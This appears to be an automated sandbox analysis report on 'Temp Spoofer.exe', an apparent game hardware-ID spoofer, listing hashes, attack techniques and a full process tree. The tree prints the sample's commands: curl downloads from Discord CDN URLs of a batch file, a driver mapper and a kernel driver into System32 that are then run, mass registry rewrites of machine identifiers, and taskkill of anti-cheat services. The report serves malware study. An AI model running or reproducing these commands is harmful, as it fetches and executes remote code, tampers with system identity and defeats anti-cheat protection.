d64fee6bb51c86b3b04217a090f59d16a8d60ae02385c8d6e0c9f361e7945081

Analysis

max time kernel
150s
max time network
145s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
15/06/2024, 18:56

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

Temp Spoofer.exe
Size

669KB
MD5

3cfca1029fe1c044dd240e81471967b9
SHA1

8668de133c120645eae9de73fdeb89cb82a34c53
SHA256

d64fee6bb51c86b3b04217a090f59d16a8d60ae02385c8d6e0c9f361e7945081
SHA512

8bd23c1f23b6e7e21a173460167815b4d1b141bf6e847dfd0032773ccc15efa879d2e14374d90f97f0360fb0a42ba908f013890deb6c640d3cb8317bbb11d3d2
SSDEEP

12288:CmB33xru4YHsYukZNyixyaUyL4SDUssmnL:/J3lu5kkZNbxbUyrDUqnL

Score

9^/10

defense_evasion execution impact ransomware

Malware Config

Signatures

Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047

Enumerates connected drives 3 TTPs 3 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\D:	fsutil.exe
File opened (read-only)	\??\E:	fsutil.exe
File opened (read-only)	\??\F:	fsutil.exe

Drops file in System32 directory 7 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\wbem\repository\MAPPING3.MAP	svchost.exe
File opened for modification	C:\Windows\system32\wbem\repository\OBJECTS.DATA	svchost.exe
File opened for modification	C:\Windows\system32\wbem\repository\INDEX.BTR	svchost.exe
File opened for modification	C:\Windows\system32\wbem\repository	svchost.exe
File opened for modification	C:\Windows\system32\wbem\repository\WRITABLE.TST	svchost.exe
File opened for modification	C:\Windows\system32\wbem\repository\MAPPING1.MAP	svchost.exe
File opened for modification	C:\Windows\system32\wbem\repository\MAPPING2.MAP	svchost.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	reg.exe
Key deleted	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	reg.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	reg.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key created	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1	reg.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1\Identifier	reg.exe
Set value (str)	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1\Identifier = "1098321251-1005132058-662625648"	reg.exe
Key created	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0	reg.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0\Identifier	reg.exe
Set value (str)	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0\Identifier = "1098321251-1005132058-662625648"	reg.exe

Gathers network information 2 TTPs 1 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
4004	ipconfig.exe

Interacts with shadow copies 2 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

T1490

pid	Process
2868	vssadmin.exe

Kills process with taskkill 10 IoCs

evasion

pid	Process
4364	taskkill.exe
4228	taskkill.exe
3092	taskkill.exe
2464	taskkill.exe
1984	taskkill.exe
2352	taskkill.exe
3828	taskkill.exe
4984	taskkill.exe
868	taskkill.exe
3704	taskkill.exe

Modifies registry key 1 TTPs 53 IoCs

Modify Registry

T1112

pid	Process
3704	reg.exe
2744	reg.exe
3108	reg.exe
624	reg.exe
656	reg.exe
4056	reg.exe
4252	reg.exe
2976	reg.exe
3836	reg.exe
3772	reg.exe
2184	reg.exe
4744	reg.exe
2292	reg.exe
2168	reg.exe
4484	reg.exe
700	reg.exe
4492	reg.exe
436	reg.exe
3380	reg.exe
872	reg.exe
164	reg.exe
356	reg.exe
4800	reg.exe
1996	reg.exe
376	reg.exe
216	reg.exe
2356	reg.exe
2236	reg.exe
3384	reg.exe
64	reg.exe
4160	reg.exe
2188	reg.exe
2368	reg.exe
2044	reg.exe
4708	reg.exe
2916	reg.exe
4504	reg.exe
1864	reg.exe
3348	reg.exe
4176	reg.exe
3080	reg.exe
1400	reg.exe
664	reg.exe
3564	reg.exe
5076	reg.exe
596	reg.exe
868	reg.exe
4260	reg.exe
1316	reg.exe
5060	reg.exe
1052	reg.exe
196	reg.exe
3260	reg.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
3108	powershell.exe
3108	powershell.exe
3108	powershell.exe
4772	powershell.exe
4772	powershell.exe
4772	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: 33	2836	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	2836	AUDIODG.EXE
Token: SeIncreaseQuotaPrivilege	3892	WMIC.exe
Token: SeSecurityPrivilege	3892	WMIC.exe
Token: SeTakeOwnershipPrivilege	3892	WMIC.exe
Token: SeLoadDriverPrivilege	3892	WMIC.exe
Token: SeSystemProfilePrivilege	3892	WMIC.exe
Token: SeSystemtimePrivilege	3892	WMIC.exe
Token: SeProfSingleProcessPrivilege	3892	WMIC.exe
Token: SeIncBasePriorityPrivilege	3892	WMIC.exe
Token: SeCreatePagefilePrivilege	3892	WMIC.exe
Token: SeBackupPrivilege	3892	WMIC.exe
Token: SeRestorePrivilege	3892	WMIC.exe
Token: SeShutdownPrivilege	3892	WMIC.exe
Token: SeDebugPrivilege	3892	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3892	WMIC.exe
Token: SeRemoteShutdownPrivilege	3892	WMIC.exe
Token: SeUndockPrivilege	3892	WMIC.exe
Token: SeManageVolumePrivilege	3892	WMIC.exe
Token: 33	3892	WMIC.exe
Token: 34	3892	WMIC.exe
Token: 35	3892	WMIC.exe
Token: 36	3892	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3892	WMIC.exe
Token: SeSecurityPrivilege	3892	WMIC.exe
Token: SeTakeOwnershipPrivilege	3892	WMIC.exe
Token: SeLoadDriverPrivilege	3892	WMIC.exe
Token: SeSystemProfilePrivilege	3892	WMIC.exe
Token: SeSystemtimePrivilege	3892	WMIC.exe
Token: SeProfSingleProcessPrivilege	3892	WMIC.exe
Token: SeIncBasePriorityPrivilege	3892	WMIC.exe
Token: SeCreatePagefilePrivilege	3892	WMIC.exe
Token: SeBackupPrivilege	3892	WMIC.exe
Token: SeRestorePrivilege	3892	WMIC.exe
Token: SeShutdownPrivilege	3892	WMIC.exe
Token: SeDebugPrivilege	3892	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3892	WMIC.exe
Token: SeRemoteShutdownPrivilege	3892	WMIC.exe
Token: SeUndockPrivilege	3892	WMIC.exe
Token: SeManageVolumePrivilege	3892	WMIC.exe
Token: 33	3892	WMIC.exe
Token: 34	3892	WMIC.exe
Token: 35	3892	WMIC.exe
Token: 36	3892	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3736	WMIC.exe
Token: SeSecurityPrivilege	3736	WMIC.exe
Token: SeTakeOwnershipPrivilege	3736	WMIC.exe
Token: SeLoadDriverPrivilege	3736	WMIC.exe
Token: SeSystemProfilePrivilege	3736	WMIC.exe
Token: SeSystemtimePrivilege	3736	WMIC.exe
Token: SeProfSingleProcessPrivilege	3736	WMIC.exe
Token: SeIncBasePriorityPrivilege	3736	WMIC.exe
Token: SeCreatePagefilePrivilege	3736	WMIC.exe
Token: SeBackupPrivilege	3736	WMIC.exe
Token: SeRestorePrivilege	3736	WMIC.exe
Token: SeShutdownPrivilege	3736	WMIC.exe
Token: SeDebugPrivilege	3736	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3736	WMIC.exe
Token: SeRemoteShutdownPrivilege	3736	WMIC.exe
Token: SeUndockPrivilege	3736	WMIC.exe
Token: SeManageVolumePrivilege	3736	WMIC.exe
Token: 33	3736	WMIC.exe
Token: 34	3736	WMIC.exe
Token: 35	3736	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3400 wrote to memory of 216	3400	Temp Spoofer.exe	74
PID 3400 wrote to memory of 216	3400	Temp Spoofer.exe	74
PID 216 wrote to memory of 3672	216	cmd.exe	75
PID 216 wrote to memory of 3672	216	cmd.exe	75
PID 216 wrote to memory of 4524	216	cmd.exe	76
PID 216 wrote to memory of 4524	216	cmd.exe	76
PID 216 wrote to memory of 2908	216	cmd.exe	77
PID 216 wrote to memory of 2908	216	cmd.exe	77
PID 3400 wrote to memory of 2000	3400	Temp Spoofer.exe	79
PID 3400 wrote to memory of 2000	3400	Temp Spoofer.exe	79
PID 3400 wrote to memory of 68	3400	Temp Spoofer.exe	80
PID 3400 wrote to memory of 68	3400	Temp Spoofer.exe	80
PID 3400 wrote to memory of 1996	3400	Temp Spoofer.exe	81
PID 3400 wrote to memory of 1996	3400	Temp Spoofer.exe	81
PID 1996 wrote to memory of 3892	1996	cmd.exe	82
PID 1996 wrote to memory of 3892	1996	cmd.exe	82
PID 3400 wrote to memory of 3292	3400	Temp Spoofer.exe	84
PID 3400 wrote to memory of 3292	3400	Temp Spoofer.exe	84
PID 3292 wrote to memory of 3736	3292	cmd.exe	85
PID 3292 wrote to memory of 3736	3292	cmd.exe	85
PID 3400 wrote to memory of 2600	3400	Temp Spoofer.exe	86
PID 3400 wrote to memory of 2600	3400	Temp Spoofer.exe	86
PID 2600 wrote to memory of 2868	2600	cmd.exe	87
PID 2600 wrote to memory of 2868	2600	cmd.exe	87
PID 3400 wrote to memory of 1516	3400	Temp Spoofer.exe	88
PID 3400 wrote to memory of 1516	3400	Temp Spoofer.exe	88
PID 1516 wrote to memory of 2948	1516	cmd.exe	89
PID 1516 wrote to memory of 2948	1516	cmd.exe	89
PID 3400 wrote to memory of 596	3400	Temp Spoofer.exe	91
PID 3400 wrote to memory of 596	3400	Temp Spoofer.exe	91
PID 3400 wrote to memory of 4580	3400	Temp Spoofer.exe	92
PID 3400 wrote to memory of 4580	3400	Temp Spoofer.exe	92
PID 3400 wrote to memory of 4312	3400	Temp Spoofer.exe	93
PID 3400 wrote to memory of 4312	3400	Temp Spoofer.exe	93
PID 4312 wrote to memory of 3136	4312	cmd.exe	94
PID 4312 wrote to memory of 3136	4312	cmd.exe	94
PID 3136 wrote to memory of 4672	3136	net.exe	95
PID 3136 wrote to memory of 4672	3136	net.exe	95
PID 3400 wrote to memory of 2140	3400	Temp Spoofer.exe	96
PID 3400 wrote to memory of 2140	3400	Temp Spoofer.exe	96
PID 2140 wrote to memory of 2352	2140	cmd.exe	97
PID 2140 wrote to memory of 2352	2140	cmd.exe	97
PID 3400 wrote to memory of 4316	3400	Temp Spoofer.exe	100
PID 3400 wrote to memory of 4316	3400	Temp Spoofer.exe	100
PID 4316 wrote to memory of 4364	4316	cmd.exe	101
PID 4316 wrote to memory of 4364	4316	cmd.exe	101
PID 3400 wrote to memory of 2376	3400	Temp Spoofer.exe	102
PID 3400 wrote to memory of 2376	3400	Temp Spoofer.exe	102
PID 2376 wrote to memory of 3828	2376	cmd.exe	103
PID 2376 wrote to memory of 3828	2376	cmd.exe	103
PID 3400 wrote to memory of 4644	3400	Temp Spoofer.exe	104
PID 3400 wrote to memory of 4644	3400	Temp Spoofer.exe	104
PID 4644 wrote to memory of 4984	4644	cmd.exe	105
PID 4644 wrote to memory of 4984	4644	cmd.exe	105
PID 3400 wrote to memory of 3260	3400	Temp Spoofer.exe	106
PID 3400 wrote to memory of 3260	3400	Temp Spoofer.exe	106
PID 3260 wrote to memory of 4228	3260	cmd.exe	107
PID 3260 wrote to memory of 4228	3260	cmd.exe	107
PID 3400 wrote to memory of 3924	3400	Temp Spoofer.exe	108
PID 3400 wrote to memory of 3924	3400	Temp Spoofer.exe	108
PID 3924 wrote to memory of 868	3924	cmd.exe	109
PID 3924 wrote to memory of 868	3924	cmd.exe	109
PID 3400 wrote to memory of 508	3400	Temp Spoofer.exe	110
PID 3400 wrote to memory of 508	3400	Temp Spoofer.exe	110

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\Temp Spoofer.exe
"C:\Users\Admin\AppData\Local\Temp\Temp Spoofer.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3400
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\Temp Spoofer.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:216
- - C:\Windows\system32\certutil.exe
    certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\Temp Spoofer.exe" MD5
    3⤵
    PID:3672
- - C:\Windows\system32\find.exe
    find /i /v "md5"
    3⤵
    PID:4524
- - C:\Windows\system32\find.exe
    find /i /v "certutil"
    3⤵
    PID:2908
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:2000
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:68
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic diskdrive get serialnumber
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1996
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic diskdrive get serialnumber
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3892
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic baseboard get serialnumber
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3292
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic baseboard get serialnumber
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3736
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic bios get serialnumber
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2600
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic bios get serialnumber
    3⤵
    PID:2868
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c getmac
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1516
- - C:\Windows\system32\getmac.exe
    getmac
    3⤵
    PID:2948
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:596
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:4580
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop winmgmt
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4312
- - C:\Windows\system32\net.exe
    net stop winmgmt
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3136
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop winmgmt
      4⤵
      PID:4672
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im epicgameslauncher.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2140
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im epicgameslauncher.exe
    3⤵
    - Kills process with taskkill
    PID:2352
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicWebHelper.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4316
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicWebHelper.exe
    3⤵
    - Kills process with taskkill
    PID:4364
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping_EAC.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2376
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping_EAC.exe
    3⤵
    - Kills process with taskkill
    PID:3828
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteLauncher.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4644
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteLauncher.exe
    3⤵
    - Kills process with taskkill
    PID:4984
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3260
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    - Kills process with taskkill
    PID:4228
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping_BE.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3924
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping_BE.exe
    3⤵
    - Kills process with taskkill
    PID:868
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe
  2⤵
  PID:508
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    - Kills process with taskkill
    PID:3092
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EasyAntiCheat.exe
  2⤵
  PID:2644
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EasyAntiCheat.exe
    3⤵
    - Kills process with taskkill
    PID:3704
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im BEService.exe
  2⤵
  PID:4420
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im BEService.exe
    3⤵
    - Kills process with taskkill
    PID:2464
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im BattleEye.exe
  2⤵
  PID:832
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im BattleEye.exe
    3⤵
    - Kills process with taskkill
    PID:1984
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName /v ComputerName /t reg_SZ /d %random% /f >nul
  2⤵
  PID:5064
- - C:\Windows\system32\reg.exe
    reg add HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName /v ComputerName /t reg_SZ /d 10980 /f
    3⤵
    - Modifies registry key
    PID:2744
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c curl https://cdn.discordapp.com/attachments/1225582853472124929/1251608845957206046/MAC.bat?ex=666f3312&is=666de192&hm=3a2af25a2023fdcb16c6430360a7e8e535373f953d575b7a0e664332c5be37a6 -o C:\Windows\System32\Windows64Services.bat --silent
  2⤵
  PID:2932
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\Windows64Services.bat --silent
  2⤵
  PID:428
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del C:\Windows\System32\Windows64Services.bat
  2⤵
  PID:2592
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c curl https://cdn.discordapp.com/attachments/1225582853472124929/1251609876656820275/kenomapper.exe?ex=666f3408&is=666de288&hm=af10812e0e39d0947bd0f3b55530f798d424599ba1e2ac2f9382eeb8b87b8d5a -o C:\Windows\System32\wsl42.exe --silent
  2⤵
  PID:3772
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c curl https://cdn.discordapp.com/attachments/1225582853472124929/1251609586914300066/50wooferdriver.sys?ex=666f33c3&is=666de243&hm=c4c1c8e3709759bca096865f8ace2260fb2792735afa01ad89a31ee26a9bf6c7 -o C:\Windows\System32\wsl21.sys --silent
  2⤵
  PID:776
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\wsl42.exe C:\Windows\System32\null.sys --silent
  2⤵
  PID:2680
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del C:\Windows\System32\wsl42.exe
  2⤵
  PID:4628
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del C:\Windows\System32\wsl21.sys
  2⤵
  PID:3168
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName /v ComputerName /t reg_SZ /d %random% /f >nul
  2⤵
  PID:3176
- - C:\Windows\system32\reg.exe
    reg add HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName /v ComputerName /t reg_SZ /d 10980 /f
    3⤵
    - Modifies registry key
    PID:356
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ActiveComputerName /v ComputerName /t reg_SZ /d %random% /f >nul
  2⤵
  PID:1092
- - C:\Windows\system32\reg.exe
    reg add HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ActiveComputerName /v ComputerName /t reg_SZ /d 10983 /f
    3⤵
    - Modifies registry key
    PID:664
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareId /t reg_SZ /d {%random%%random%-%random%%random%-%random%%random%} /f >nul
  2⤵
  PID:4460
- - C:\Windows\system32\reg.exe
    reg add HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareId /t reg_SZ /d {1098321251-1005132058-662625648} /f
    3⤵
    - Modifies registry key
    PID:196
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareIds /t reg_SZ /d %random%%random%-%random%%random%-%random%%random% /f
  2⤵
  PID:3632
- - C:\Windows\system32\reg.exe
    reg add HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareIds /t reg_SZ /d 1098321251-1005132058-662625648 /f
    3⤵
    - Modifies registry key
    PID:4708
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SYSTEM\CurrentControlSet\Control\IDConfigDB\Hardware" "Profiles\0001 /v HwProfileGuid /t reg_SZ /d {%random%%random%-%random%%random%-%random%%random%} /f >nul
  2⤵
  PID:3076
- - C:\Windows\system32\reg.exe
    reg add HKLM\SYSTEM\CurrentControlSet\Control\IDConfigDB\Hardware" "Profiles\0001 /v HwProfileGuid /t reg_SZ /d {1098321251-1005132058-662625648} /f
    3⤵
    - Modifies registry key
    PID:1864
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\SQMClient /v MachineId /t reg_SZ /d {%random%%random%-%random%%random%-%random%%random%} /f >nul
  2⤵
  PID:1264
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\SQMClient /v MachineId /t reg_SZ /d {1098321251-1005132058-662625648} /f
    3⤵
    - Modifies registry key
    PID:1316
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\SQMClient /v WinSqmFirstSessionStartTime /t reg_QWORD /d %random%%random%-%random%%random%-%random%%random% /f
  2⤵
  PID:3212
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\SQMClient /v WinSqmFirstSessionStartTime /t reg_QWORD /d 1098321251-1005132058-662625648 /f
    3⤵
    - Modifies registry key
    PID:2184
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallTime /t reg_QWORD /d %random%%random%-%random%%random%-%random%%random% /f
  2⤵
  PID:4320
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallTime /t reg_QWORD /d 1098321251-1005132058-662625648 /f
    3⤵
    - Modifies registry key
    PID:2168
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallDate /t reg_QWORD /d %random%%random%-%random%%random%-%random%%random% /f
  2⤵
  PID:3356
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallDate /t reg_QWORD /d 1098321251-1005132058-662625648 /f
    3⤵
    - Modifies registry key
    PID:5060
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Cryptography /v MachineGuid /t reg_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:3788
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Cryptography /v MachineGuid /t reg_SZ /d 1098321251-1005132058-662625648 /f
    3⤵
    - Modifies registry key
    PID:1052
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Cryptography /v GUID /t reg_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:1692
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Cryptography /v GUID /t reg_SZ /d 1098321251-1005132058-662625648 /f
    3⤵
    - Modifies registry key
    PID:3080
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SYSTEM\HardwareConfig /v LastConfig /t reg_SZ /d %random%%random%-%random%%random%-%random%%random% /f
  2⤵
  PID:780
- - C:\Windows\system32\reg.exe
    reg add HKLM\SYSTEM\HardwareConfig /v LastConfig /t reg_SZ /d 1098321251-1005132058-662625648 /f
    3⤵
    - Modifies registry key
    PID:4800
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\NVIDIA" "Corporation\Global /v ClientUUID /t reg_SZ /d %random%%random%-%random%%random%-%random%%random% /f
  2⤵
  PID:4928
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\NVIDIA" "Corporation\Global /v ClientUUID /t reg_SZ /d 1098321251-1005132058-662625648 /f
    3⤵
    - Modifies registry key
    PID:3108
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\NVIDIA" "Corporation\Global /v PersistenceIdentifier /t reg_SZ /d %random%%random%-%random%%random%-%random%%random% /f
  2⤵
  PID:4204
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\NVIDIA" "Corporation\Global /v PersistenceIdentifier /t reg_SZ /d 1098321251-1005132058-662625648 /f
    3⤵
    - Modifies registry key
    PID:2916
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\NVIDIA" "Corporation\Global\CoProcManager /v ChipsetMatchID /t reg_SZ /d %random%%random%-%random%%random%-%random%%random% /f
  2⤵
  PID:3892
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\NVIDIA" "Corporation\Global\CoProcManager /v ChipsetMatchID /t reg_SZ /d 1098321251-1005132058-662625648 /f
    3⤵
    - Modifies registry key
    PID:1996
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi" "Port" "0\Scsi" "Bus" "0\Target" "Id" "0\Logical" "Unit" "Id" "0 /v Identifier /t reg_SZ /d %random%%random%-%random%%random%-%random%%random% /f
  2⤵
  PID:3792
- - C:\Windows\system32\reg.exe
    reg add HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi" "Port" "0\Scsi" "Bus" "0\Target" "Id" "0\Logical" "Unit" "Id" "0 /v Identifier /t reg_SZ /d 1098321251-1005132058-662625648 /f
    3⤵
    - Modifies registry key
    PID:4160
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi" "Port" "1\Scsi" "Bus" "0\Target" "Id" "0\Logical" "Unit" "Id" "0 /v Identifier /t reg_SZ /d %random%%random%-%random%%random%-%random%%random% /f
  2⤵
  PID:3292
- - C:\Windows\system32\reg.exe
    reg add HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi" "Port" "1\Scsi" "Bus" "0\Target" "Id" "0\Logical" "Unit" "Id" "0 /v Identifier /t reg_SZ /d 1098321251-1005132058-662625648 /f
    3⤵
    - Modifies registry key
    PID:3348
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0 /v Identifier /t reg_SZ /d %random%%random%-%random%%random%-%random%%random% /f
  2⤵
  PID:4400
- - C:\Windows\system32\reg.exe
    reg add HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0 /v Identifier /t reg_SZ /d 1098321251-1005132058-662625648 /f
    3⤵
